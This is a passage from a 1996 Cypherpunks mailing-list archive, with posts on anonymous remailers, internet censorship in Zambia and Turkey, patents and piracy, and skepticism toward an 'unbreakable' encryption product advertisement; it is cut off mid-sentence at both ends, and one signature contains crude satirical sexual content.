it might notice that your sentence length variation wasn't enough for a given
style of writing, and prompt you to write some shorter (and/or longer)
sentences - including via breaking up the ones you've written already. One
would use a different style setting for each nym.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 19 Feb 1996 12:12:06 +0800
To: bdavis@thepoint.net
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <01I1DI16BLXCA0V3WD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bdavis@thepoint.net"  "Brian Davis" 17-FEB-1996 23:44:32.70

>On Sat, 17 Feb 1996, Dave Farber wrote:

>> The President can not rule anything unconstitutional. He can tell justice
>> not to enforce it but sometime local federal prosecutors do what they want

>U.S. Attorneys serve at the pleasure of the President.  U.S. Attorneys 
>cannot fire their Assistants -- they can only recommend such action to 
>the Attorney General or the Deputy Attorney General.

	As I understand it, what the President can do is order them not to
defend its constitutionality - making it _real_ easy to remove in court. BTW,
why (other than political cowardice) hasn't Clinton done so with respect to
gays in the military?
	-Allen

P.S. Since that last question is getting off the subject, feel free to do it in
private email.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Mon, 19 Feb 1996 12:43:30 +0800
To: sean@lucifer.com (Sean Morgan)
Subject: Re:
In-Reply-To: <2.2.32.19960219013349.0068799c@lucifer.com>
Message-ID: <9602190415.AA28189@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >Ettrium 
> 
> Yttrium?

	My lord you've caught me with my rare earths down - its
Erbium not Yttrium.  Sorry about that ...

					Dave 


> -------------------------------+-----------------------------------------
> Sean Morgan (sean@lucifer.com) | Let me tell you a few bits about myself:  
>                                |   CACTTGCCGGGTAACACTCCATGAAATTCTTCTCAGCC
> http://www.lucifer.com/~sean/  |   AGGTGTCGACGCTAGGATCAACCTTTAAGTGAACT...
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 19 Feb 1996 12:52:09 +0800
To: cypherpunks@toad.com
Subject: Anonymous remailers are a virus spreading online! (Replies)
In-Reply-To: <199602171622.KAA02514@blatz.cs.uwm.edu>
Message-ID: <Ul9zb2G00YUtAuHYoO@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from Computer Privacy Digest. These messages are in reply to
the Strassmann/Marlow paper archived at:
     http://fight-censorship.dementia.org/fight-censorship/dl?num=1159

-Declan

---------- Forwarded message begins here ----------

From: cnordin@vni.net (Craig Nordin)
Date: 15 Feb 1996 15:02:16 -0500
Subject: Re: Anonymous Remailers are a Virus Spreading Online
Organization: Virtual Networks 
References: <comp-privacy8.14.10@cs.uwm.edu>

Note the SAIC name in the byline.  Note that CIA folk have often
published stuff and not fessed up to having a CIA background.

Anonymous remailers are the number one threat to total control via
government.

If you read something anonymous you can discard it simply because the
writer is unwilling to stand beside his words.  Or, you can see if it
is an apt piece of writing and decide that it does apply, even without
an author.

This thread is part of a "school" of such topics now reaching us
through various media.  Note the recent news made by an internet
announcement that a girl was being abused by her mother. Kids are said
to be making bombs from instructions via the Internet (and why were
they making so many bombs learned from libraries and colleges before
and not even making it past the local news?).

Some people don't like utterly free speech.

-- 
http://www.vni.net/
cnordin@vni.net                Fly VNI:  Send E-Mail to  info@vni.net


------------------------------

From: "Prof. L. P. Levine" <levine@blatz.cs.uwm.edu>
Date: 15 Feb 1996 16:22:41 -0600 (CST)
Subject: Re: Anonymous Remailers are a Virus Spreading Online
Organization: University of Wisconsin-Milwaukee

My most serious question about anonymous remailers is this:  How can we
be sure that the operator of such a remailer is not a federal or other
governmental agent?  That person is trusted with our privacy and has
all the data needed to identify a user.

If I were the Feds I would already have set up such a "sting"
operation, the temptation is just too great.

--
Leonard P. Levine               e-mail levine@cs.uwm.edu
Professor, Computer Science        Office 1-414-229-5170
University of Wisconsin-Milwaukee  Fax    1-414-229-6958
Box 784, Milwaukee, WI 53201     
         PGP Public Key: finger llevine@blatz.cs.uwm.edu


------------------------------

 ---------------------------------+-----------------------------------------
Leonard P. Levine                 | Moderator of:     Computer Privacy Digest
Professor of Computer Science     |                  and comp.society.privacy
University of Wisconsin-Milwaukee | Post:                comp-privacy@uwm.edu
Box 784, Milwaukee WI 53201       | Information: comp-privacy-request@uwm.edu
                                  | Gopher:                 gopher.cs.uwm.edu 
levine@cs.uwm.edu                 | Web:           gopher://gopher.cs.uwm.edu
 ---------------------------------+-----------------------------------------


------------------------------

End of Computer Privacy Digest V8 #015
******************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 19 Feb 1996 12:54:59 +0800
To: yesim ozben <cypherpunks@toad.com
Subject: Re: Turkey
Message-ID: <2.2.32.19960219042345.00b6c274@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:46 AM 2/19/96 +0300, yesim ozben wrote:
>I read that they are trying to pass some law for the net to be controlled 
>by a monopoly and the reason is to be able to control things. So it's 
>spreading.
>
>Yesim
>

But if Turkey joins the EU, they will have to give up national
communications monopolies.  I knew the Treaty of Rome was good for something.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Mon, 19 Feb 1996 12:59:01 +0800
To: winkjr@teleport.com (Wink Junior)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602190320.TAA15431@julie.teleport.com>
Message-ID: <199602190432.XAA28530@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Wink Junior:
: 
:          IPG Guarantees Absolute Privacy on Internet. Using the
:          trademark CRE transform, the IPG PCX Nvelopes system
:          translates any intelligible digitized information into
:          utterly random gibberish.

Which makes one wonder what this ad actually said BEFORE they passed
it through the "CRE transform".

- -- 
    Mark Rogaski     | wendigo@gti.net | wendigo@pobox.com |  I use PGP, so
System Administrator |   http://www.pobox.com/~wendigo/    |    should you!
Global Telecom, Inc. | Why read when you can just sit and  | finger for pubkey
  http://w3.gti.net/ |          stare at things?           | wendigo@pobox.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSf9JMajO20pqAytAQF8GQP/ducu8Gf1Y91LecmRbEng9Hl9qjI70nsR
7xL9jKE72A2zifolwsYuzyifmrhNnjxVYnRzGCCKX/qvY3bWvLTpH2S9i9oDx2/2
89rfkvMsyo+P9QqIjqvPpN59BlVOFAcOtnRyJjJWrpkGVmCh5wYi+dLzptqtaRwp
gj/73ZiisVo=
=qdMW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maruishi@netcom.com
Date: Mon, 19 Feb 1996 16:00:37 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: True random numbers
In-Reply-To: <Pine.BSD.3.91.960218131947.11216A-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.3.89.9602182316.A29161-0100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for all the information. 
Thanks for everyones insightful comments.

maruishi@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 19 Feb 1996 15:58:31 +0800
To: Deranged Mutant <WlkngOwl@UNiX.asb.com>
Subject: Re: Risks of a style anonymizer?
In-Reply-To: <199602190719.CAA04302@UNiX.asb.com>
Message-ID: <Pine.SOL.3.91.960218234054.14462B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Feb 1996, Deranged Mutant wrote:

> 
> > When did it become the style to have a clause, a colon, and another 
> > clause as the title of things? This seems to be universal in govt and 
> > university and highbrow blue-paper reports nowadays!
> 
> ...always has been in the scientific literature.  Also quite popular 
> in Usenet and mailing list posts.

Not forgetting such mysterious works of science as "Manos: The Hand of Fear"

---
They say in  online country		So which side are you on boys
There is no middle way			Which side are you on
You'll either be a Usenet man		Which side are you on boys
Or a thug for the CDA			Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 19 Feb 1996 15:00:21 +0800
To: cypherpunks@toad.com
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <ad4d58010b0210043254@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:54 AM 2/19/96, Alan Horowitz wrote:
>The crusaders liked to define their thuggery and thievery in the Balkans
>and middle East as being driven by Christian imperatives. Should we say
>that the Crusader's *actions* were a good definition of "christian
>principles"?

Yes.

Next question?


--TCM

[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should fuck him." So the two daughters got him drunk and
screwed him all that night. Sure enough, Dad got them pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents,
your pet dog, or the farm animals, unless God tells you to. [excerpts from
the Old Testament, Modern Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 19 Feb 1996 13:45:08 +0800
To: cypherpunks@toad.com
Subject: Internet newspaper censorship in Zambia
In-Reply-To: <Pine.3.89.9602182006.A26846-0100000@well>
Message-ID: <Yl_0WR200YUt4uHgZl@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message begins here ----------

Date: Sun, 18 Feb 1996 21:07:14 -0800 (PST)
From: Declan McCullagh <declan@well.com>
Subject: Internet newspaper censorship in Zambia
To: fight-censorship+@andrew.cmu.edu
cc: dlush@ingrid.misa.org.na, mbennett@zamnet.zm, mkakanda@zamnet.zm,
        neil@zamnet.zm, ftema@zamnet.zm, fsh95s@Timon.ACU.EDU, post@zamnet.zm

Attached is disturbing information about state censorship of the physical
and online editions of The Post newspaper in Zambia. 

If anyone reading this emails me the complete text of the banned February
5 edition of the newspaper, I'll put it on my web site. Or, send me email
for an address of an anonymous FTP site where you can upload it. I promise
to keep your identity confidential.

(I'm already hosting a book banned by the French government:
    http://www.cs.cmu.edu/~declan/le-secret/)

Please redistribute this message as appropriate.

Best,

Declan
declan@well.com


---------- Forwarded message ----------

>ACTION ALERT UP-DATE - ZAMBIA
>FEBRUARY 16, 1996
>
>INTERNET EDITION OF THE POST ALSO BANNED
>
>
>The Internet edition of The Post newspaper of February 5 - banned by
>President Frederick Chiluba in terms of Section 53 of the Penal Code - has
>been removed from the paper's World Wide Web (WWW) site.
>
>Mark Bennet of Zamnet Communications, the privately-owned Internet service
>provider which hosts The Post's WWW site, says Zamnet was left with little
>choice but to make the February 5 edition of The Post inaccessible on the
>Internet.
>
>Bennet says Zamnet kept the banned version of The Post on the WWW for two
>days after it was published, but was then warned by a "someone senior in
>the police" that the company was liable to be raided and charged with
>possession of a prohibited publication.  The President's ban of edition 401
>of The Post covered "all forms" of the paper, says Bennet.
>
>Visit The Post's WWW site (http://www.zamnet.zm) and you will find the
>February 5 edition listed in the paper's archive of back editions, but
>click on the edition and the file will not open. However, following
>editions of the paper - containing stories about the banning, the police
>raid on The Post's offices, and subsequent arrest and charging of
>Editor-in-Chief Fred M'membe, Managing Editor Bright Mwape and Special
>Projects Editor Matsautso Phiri with contravening the State Security Act -
>can be read. The State Security Act charges relate to a report published in
>the February 5 edition of The Post revealing the government's plans to hold
>a referendum on the adoption of a new constitution.
>
>A recent addition to the Zamnet WWW site is "Zambia Today" - stories from
>the state-run news agency ZANA, which are up-dated every couple of hours.
>"State House was very keen that the world didn't see The Post newspaper
>alone," said Bennet. "We kept telling them that we were going to keep The
>Post, but that we were happy to put up a State House page, or a page for
>ZANA. We are trying to actively encourage them to be positive."
>
>Bennet stresses Zamnet was an independent company and would not succumb to
>self-censorship as a result of political pressure. Zamnet is housed at the
>University of Zambia, which has a 52 per cent share holding in the company.
>Although funded by the government, the University enjoys academic autonomy,
>says Bennet, "so there is no possibility of pressure (being exerted on
>Zamnet) through the University".
>
>M'membe, Mwape and Phiri are due to appear in the High Court today to hear
>whether or not their bail - granted last week Wednesday (February 7) after
>initially being turned down by a magistrate - can be reviewed. If the court
>decides their bail can be reviewed, the three stand a chance of returning
>to jail to await trail on the charges of contravening Section 4 of the
>State Security Act, which prohibits the publication of classified
>information. If convicted, the journalists could be jailed for up to 25
>years.
>
>However, speaking on Namibian Broadcasting Corporation (NBC) news this
>morning (February 16), Mwape said he was not deterred by the prospect of a
>lengthy term in jail if convicted. "It is about time such a challenge was
>made," said Mwape. "The freedom we are talking about will only come if we
>are prepared to make sacrifices for it."
>
>ends
>
>David Lush
>Media Institute of Southern Africa (MISA)
>Private Bag 13386
>Windhoek, Namibia
>Tel. +264 61 232975, Fax. 248016
>e-mail: dlush@ingrid.misa.org.na







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant <wlkngowl@unix.asb.com>
Date: Mon, 19 Feb 1996 13:48:20 +0800
To: cypherpunks@toad.com
Subject: Re: True random numbers
Message-ID: <199602190524.AAA00158@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

James M. Cobb wrote:
> 
> 
> 
>   The Centre de Recherches Mathematique is hosting a year-long
>   program in combinatorics and group theory in 1996-1997.  The
>   year will be organized around a number of workshops spread
>   throughout the year.

Thanks for the tip...
[..]
>   If you'd like to read RFC 1750, "Randomness RecommendationsGood...
[..]
>   References

[...Lots of references, some with not much clear relation
 to randomness deleted...]

Overdoing it a bit, aren't we?


Rob
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSgJnCoZzwIn1bdtAQGjRQF/bP9RUW9899uIPBaUEJpXOjuEQ3goYroI
AspHda8KpO4DfbYA6uecyCtTS15N9u8y
=pzpK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 19 Feb 1996 14:02:11 +0800
To: Carson Chittom <carson.chittom@starnetbbs.com>
Subject: Re: Books
In-Reply-To: <9602181915317383@starnetbbs.com>
Message-ID: <Pine.BSD.3.91.960219002452.29751A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Carson, 
 
 
  I recommend: 
 
 
      Bruce Schneier 
 
      E-Mail Security. How to Keep Your Electronic Messages Private. 
 
      John Wiley & Sons 
 
      1995 
 
      ISBN: 0 471 05318 X 
 
      1 800 22 559 4539 
 
 
 
  Cordially, 
 
  Jim 
 
 
 
  INCLOSURE: 
 
  [excerpt from your message] 

  ...I do not know the slightest thing about encryption.  Could anyone 
  recommend any sources that would be understandable?  Ideally, I'd like 
  to have books.... 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant <wlkngowl@unix.asb.com>
Date: Mon, 19 Feb 1996 14:11:32 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602190539.AAA00231@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

What the hell. That's pretty realistic in one sense... "if you break our
code, we'll sell you the company for $1.00, because that's about all
it'll be worth..."

The One-time-pad reference doesn't make me feel secure about it at all.

In fact I'm quite suspicious now...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSgNICoZzwIn1bdtAQECwgGAo06UUpUrpQr8MitBjIqgvf5avX9EPSDt
0MxWA0Csmwd2bNYG2Ro4KavnxR69Xhoi
=XTPi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 19 Feb 1996 08:04:00 +0800
To: cypherpunks@toad.com
Subject: Piracy Bests ITAR
Message-ID: <199602182345.AAA07577@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Economist, 17 Feb 1995, p. 17.

Should foreigners' intellectual property always be
protected? [Excerpts]


Is it right to expect governments, especially poor ones,
to honour new World Trade Organization rules on
intellectual property?

Some economists have made a good case that slack
enforcement of such rules may sometimes do little harm.
Local firms benefit by acquiring pirated technology more
cheaply than the real thing; consumers acquire affordable
high-tech products and close copies of branded goods.

Although the original producers of the intellectual
property lose out, it is sometimes hard to tell how much.
They might anyway have sold nothing in a poor country at
rich prices. And provided that counterfeiters make
reasonably faithful copies, piracy is free publicity: how
many Chinese would know about Microsoft's latest
programs, or listen to Michael Jackson's new album, had
they not been able to buy illegal imitations? ...

It is not always obvious what theft is. Much in patent
and copyright law is arbitrary. But who says American
copyright law is correct? More to the point, why should
China accept America's view of how a drug design, say,
should be accorded patent protection?

In some cases, the interests of rich and poor countries
are clearly at odds: one side has all the property. There
seems to be no objective standard to appeal to.
Eventually, this may change: as poor countries produce
more innovations themselves, their own inventors will
demand greater protection. Meanwhile, the lot of many
intellectual-property producers will not be a happy one.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 19 Feb 1996 08:26:52 +0800
To: cypherpunks@toad.com
Subject: Re: patents suck
Message-ID: <199602182353.AAA07801@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


jf_avon@citenet.net wrote:

>>With patents, there is a problem of large companies owning them 
>>yet oing nothing with them except suing other companies or
>>individuals.

>If you reject that possibility, you imply that the result of
>your work for yourself might not be your own property.  It does
>not matter if the idea patented was originated be the patent
>holder of was purchased by the patent holder.  Money is
>equivalent to personnal work.

Bullshit. Corporations do not work; their employees do. The
creativity of employees is sat upon as net worth, but nothing
is produced.  Money is only worth something if it is circulating
in an economy; a corporation only has worth if it produces
something.

Instead corporations produce nothing.  They sit on resources,
preventing anyone else from producing, because the current system
favors non-production and an inflationary and wasteful economy
based on speculation.

Economic equivalent of people who sit around and talk but don't
get off their asses and do something.

>And the property rights *are* fundamentals (even if not

No, they are not fundamental anything. They are taken for granted
in the modern West as a rationale. It's a nice one, and I don't
have too many arguments... except when people claim a false
dilemma of either total private property or total socialism.

Why not a form of property based on use?  If you don't use your
property, after a while you cease owning it.  It was originally
a rationale in Europe and early American colonies because so
many people claimed to own land that they never saw, despire the
fact that natives and settlers lived there.

Extended to patents... corporations do a lot of R but no D, but
legally no one else can make use of it either.  Unisys didn't
market LZW compression and let everyone else use it... then they
decided they should have been making losts of mulah and wanted
to pull the plug and get royalities.  IBM has done negligable
production on arithmetic coding, so a lot of independ developers
ignore the patents.  Similar arguments can be made about PK
crypto.


>You can not have your cake and eat it too...

Huh? What does that have to do with this argument?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 19 Feb 1996 14:18:57 +0800
To: Sean Gabb <cea01sig@gold.ac.uk>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <Pine.SUN.3.91.960216105547.22887B-100000@scorpio.gold.ac.uk>
Message-ID: <Pine.SV4.3.91.960219004945.7650A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Sean,

Women's place in Islam is just fine. The problem is that _Arabs_ like to 
define their ages-old cultural suppression of woman as Islamic. Which it is
not.

YOu in England are dealing with an unrepresentative sample of the Islamic 
world. May I suggest a few weeks of traveling through Java and Mindanao, 
to see another side of the coin.

The crusaders liked to define their thuggery and thievery in the Balkans 
and middle East as being driven by Christian imperatives. Should we say 
that the Crusader's *actions* were a good definition of "christian 
principles"?

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 19 Feb 1996 15:06:20 +0800
To: Deranged Mutant <wlkngowl@unix.asb.com>
Subject: Re: Risks of a style anonymizer?
In-Reply-To: <199602172305.SAA23887@bb.hks.net>
Message-ID: <Pine.SV4.3.91.960219010911.7650E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


When did it become the style to have a clause, a colon, and another 
clause as the title of things? This seems to be universal in govt and 
university and highbrow blue-paper reports nowadays!

<<Perry Metzger off-topic complaint included by reference>>

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 19 Feb 1996 14:51:37 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Legal status of Indian Reservations and CDA
In-Reply-To: <ad4bc83401021004433d@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960219011516.7650G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The Peyote US Supreme Court decision was based on an off-reservation 
arrest. The defense argued freedom of religion, not jurisdiction.

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 19 Feb 1996 14:57:04 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Piracy Bests ITAR
In-Reply-To: <199602182345.AAA07577@utopia.hacktic.nl>
Message-ID: <Pine.SV4.3.91.960219012547.7650K-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> From: Anonymous <nobody@REPLAY.COM>
> Some economists have made a good case that slack
> enforcement of such rules may sometimes do little harm.
> Local firms benefit by acquiring pirated technology more
> cheaply than the real thing; consumers acquire affordable
> high-tech products and close copies of branded goods.

   Yes, when Mr Anon travels to a beach in Jamaica or in Mombasa, he 
shouldn't complain when the taxi driver takes him, not to his requested 
destination, buit some dark alley where Mr Anon gets clunked over the 
head and his wallet removed. The locals need the money more than Mr 
rich-tourist-on-vacation Anon.  They're only doing socialist justice, 
after all.

Property is property. Theft is theft.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: yesim ozben <c043484@narwhal.cc.metu.edu.tr>
Date: Mon, 19 Feb 1996 08:15:34 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.A32.3.91.960219014243.59031C-100000@narwhal.cc.metu.edu.tr>
MIME-Version: 1.0
Content-Type: text/plain


Some news from Turkey. Up to now all connections to Internet were 
established and managed by TR-NET the collaboration of a university 
(METU) and the the national scientific research center (Tubitak). 
Recently the phone company opened a tender for this task and I think the 
same group or some company or foundation they were part of won it. Today 
I read that they are trying to pass some law for the net to be controlled 
by a monopoly and the reason is to be able to control things. So it's 
spreading.

Yesim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant <wlkngowl@unix.asb.com>
Date: Mon, 19 Feb 1996 15:15:43 +0800
To: cypherpunks@toad.com
Subject: Re: Piracy Bests ITAR
Message-ID: <199602190657.BAA00505@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alan Horowitz wrote:
>    Yes, when Mr Anon travels to a beach in Jamaica or in Mombasa, he
> shouldn't complain when the taxi driver takes him, not to his requested
> destination, buit some dark alley where Mr Anon gets clunked over the
> head and his wallet removed. The locals need the money more than Mr
> rich-tourist-on-vacation Anon.  They're only doing socialist justice,
> after all.
> 
> Property is property. Theft is theft.

Such absolutism! And an awful analogy (not entirely worthless, but
not very good either).

Has nothing to do with socialism... even works nice in a capitalist
as in the case where people try the software, decide they like it,
and then buy it latter when they can afford it. Sidekick and WordStar
became popular because of this "borrowing".  MS-DOS probably would not
be so widespread if it weren't pirated.

Oh yeah, patents as well... I assume from your post that you didn't
use PGP before the MIT version (assuming you're in the US...).
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSgfQSoZzwIn1bdtAQFVKwGA2lngCVinsxHtw45XdbNfTHc/Whv3BGey
IvKs3cspDmvLe4cdyHWNXfzaw/u3aoCm
=JClJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 19 Feb 1996 15:32:50 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Risks of a style anonymizer?
Message-ID: <199602190719.CAA04302@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



> When did it become the style to have a clause, a colon, and another 
> clause as the title of things? This seems to be universal in govt and 
> university and highbrow blue-paper reports nowadays!

...always has been in the scientific literature.  Also quite popular 
in Usenet and mailing list posts.

My comment was in jest anyway. Yeesh.

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 19 Feb 1996 17:04:31 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymous remailers are a virus spreading online! (Replies)
In-Reply-To: <Ul9zb2G00YUtAuHYoO@andrew.cmu.edu>
Message-ID: <199602190842.DAA30682@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Leonard P. Levine wrote somewhere:
> My most serious question about anonymous remailers is this:  How can we
> be sure that the operator of such a remailer is not a federal or other
> governmental agent?  That person is trusted with our privacy and has
> all the data needed to identify a user.
> 
> If I were the Feds I would already have set up such a "sting"
> operation, the temptation is just too great.

You will be pleased to hear that this problem was anticipated at least 15
years ago (in David Chaum's paper on "digital mixes"). Briefly, the solution
is to use multiple layers of encryption to distribute trust among several
remailer operators. Before it is remailed, a message is encrypted with public
keys belonging to each of a sequence of remailers. As each remailer receives
a message, it removes the outer layer of encryption using its private key,
revealing another encrypted message and the next address to which it should
be sent. Cooperation of all the remailers in the chain is needed to link the
originating address to the message that is eventually delivered to a 
recipient. 

For a longer exposition on the current state of the art in deployed
mail anonymizers, see http://www.obscura.com/~loki/remailer/remailer-essay.html

Note that the availability of strong anonymity critically depends upon the
availability of strong cryptography. If the Department of the Treasury 
Automated Systems Division holds all the remailers' private keys, then it can
easily determine the originators of all anonymously remailed messages.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 19 Feb 1996 18:16:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <2.2.32.19960218215936.006b4120@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:42 AM 02/19/96 -0500, Futplex wrote:

>> We will even prepare, or help prepare, the DIR.LST for users.
>>
>> While we have the software and manufacturing facility to do
>> that quickly, it is not easily transportable, to say the
>> least, and certain aspects of it, we consider highly proprietary.
>
>"not easily transportable, to say the least" ???  
>Any ideas to what this might refer ?
>

Disk duplicating hardware? CDROM mass duplicator? (gotta put all those bits *somewhere* :-) Maybe it's the fission pile they're using as a RNG.....

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSeExMVrTvyYOzAZAQEKkQQAs/MfDsFq0YHiP0D40LnJ4E2Sbe1hkx64
vLngAmZMgck7Hl6XiSjkuGJFYQrFzalOMhl7PH5FLcnGM/THDxhsMZo6K4ygZZmf
MZO5P0fJ4hfnBEjHp/Uv3407ITj2kJ51bf6Ct6npNmmPghLRhakotoD4IqbYy8Ii
iYWP6H1fQX8=
=WB2C
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 19 Feb 1996 17:59:50 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602190320.TAA15431@julie.teleport.com>
Message-ID: <199602190942.EAA30761@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Internet.Privacy.Guaranteed (IPG)" writes:
>	   CRE Transforms,
>          trademark IPG, are the only acknowledged unbreakable method
>          of so transforming digitized information. There are no
>          passwords, encryption keys, or anything like that to conjure
>          up, remember, and perhaps forget. 

Neat trick, unless they're using biometrics, which doesn't appear to be the
case :}

[...]
>                      Don't Waste your time !

I think they just said it best themselves, but I'll comment a bit more....

[...]
>          Every informed expert of the
>          technology will confirm, without reservation, that the IPG
>          system is not breakable, as many already have!  

All under NDA, I suppose. Note that they don't even name an "informed expert of
